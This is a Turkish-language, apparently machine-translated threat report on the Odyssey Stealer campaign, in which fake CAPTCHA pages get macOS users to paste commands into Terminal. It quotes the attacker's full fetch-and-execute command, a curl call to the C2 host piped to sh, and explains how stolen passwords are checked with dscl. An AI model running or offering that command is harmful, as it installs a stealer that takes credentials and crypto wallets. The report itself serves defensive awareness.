MacOS kullanıcılarını hedefleyen gelişmiş yeni bir kötü amaçlı yazılım kampanyası ortaya çıktı ve hassas kullanıcı kimlik bilgilerini ve finansal verileri toplamak için tasarlanmış kötü amaçlı elma metinlerini dağıtmak için aldatıcı “ClickFix” taktikleri kullandı.
Kampanya, meşru finans platformlarını ve Apple App Store web sitelerini yakından taklit eden yazım hattı alanlarından yararlanarak, kullanıcıları sistemlerinde tehlikeli komutlar yürütmeye kandıran ikna edici bir cephe oluşturuyor.
Saldırı, kullanıcılar yanlışlıkla sahte Cloudflare tarzı CAPTCHA istemlerini sunan kötü amaçlı alan adlarını ziyaret ettiklerinde başlar.
.png
)
Görünüşte meşru bu doğrulama sayfaları, MACOS kullanıcılarına robot olmadıklarını kanıtlamak için Terminal uygulamalarına baz64 kodlu komutları kopyalamalarını ve yapıştırmalarını öğretir.
Yürütüldükten sonra, bu komutlar tarayıcı kimlik bilgilerini, kripto para cüzdanlarını ve birden fazla uygulamada depolanan hassas kişisel bilgileri hedefleyen kapsamlı bir veri hırsızlığı işlemi başlatır.
Cyfirma araştırmacıları, bu kötü amaçlı yazılımları, daha önce bilinen Poseidon Stealer’ın Amos Stealer’ın çatalı olarak ortaya çıkan yeniden markalı bir versiyonu olan Odyssey Stealer olarak tanımladılar.
Araştırma ekibi, bu etkinliğe bağlı birden fazla komuta ve kontrol panelini ortaya çıkardı ve altyapı öncelikle Rusya’da barındırıldı.
Kötü amaçlı yazılım, Batı ülkelerindeki, özellikle ABD ve Avrupa Birliği’ndeki kullanıcıları hedeflemek için açık bir tercih gösterirken, Bağımsız Devletler Topluluğu Milletleri Topluluğu’ndaki mağdurlardan göze çarpan bir şekilde kaçınmaktadır.
Odyssey Stealer, sosyal mühendislik taktiklerini sofistike teknik yeteneklerle birleştiren macOS hedefleme kötü amaçlı yazılımlarında ilgili bir evrimi temsil eder.
Yazılım güvenlik açıklarına dayanan geleneksel kötü amaçlı yazılımlardan farklı olarak, bu kampanya, kullanıcılara rutin doğrulama prosedürleri gibi görünen tanıdık görünümlü güvenlik istemlerini sunarak insan psikolojisini kullanıyor.
Saldırganlar, dağıtım web sitelerini güvenilir platformları yansıtmak için dikkatlice hazırladılar, bu da tespiti özellikle şüphesiz kullanıcılar için zorlaştırıyor.
Enfeksiyon mekanizması ve yük yürütme
Kötü amaçlı yazılımların enfeksiyon mekanizması, alan yazımı ile başlayan ve kapsamlı sistem uzlaşmasıyla sonuçlanan çok aşamalı bir sürece dayanır.
.webp)
Kullanıcılar kötü amaçlı alanları ziyaret ettiklerinde, meşru Captcha doğrulama sistemlerinin görünümünü çoğaltan profesyonel olarak tasarlanmış sayfalarla karşılaşırlar.
Sahte istem, macOS kullanıcılarının aşağıdaki gibi görünen bir komutu yürütmeleri için talimatları görüntüler:-
curl -s http://odyssey1.to:3333/d?u=October | shBu komut, saldırganın komut ve kontrol sunucusundan bir Applescript alır ve yürütür. Komut dosyası, işlev adlarını gizlemek için alfanümerik bir şaşkınlık kullanır, ancak analiz gerçek amacını ortaya çıkarır.
Yürütme üzerine, kötü amaçlı yazılım, MKDIR komutunu kullanarak geçici bir dizin yapısı oluşturur, özellikle de /tmp/lovemrtrump operasyonel tabanı olarak.
Applescript daha sonra kullanıcının sistem şifresini yakalamak için tasarlanmış ikna edici bir kimlik doğrulama istemini görüntüler.
Çalıntı kimlik bilgilerini sessizce doğrulamak için, macOS DSCL komutunu Authonly parametresiyle kullanır ve doğrulama işleminin kullanıcıdan gizli kalmasını sağlar.
Bu teknik, kötü amaçlı yazılımların sistem uyarılarını veya kullanıcı şüphesini tetiklemeden şifre geçerliliğini onaylamasını sağlar ve saldırganların macOS güvenlik mekanizmalarını derinlemesine anlayarak gösterir.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> Herhangi birini deneyin. Şimdi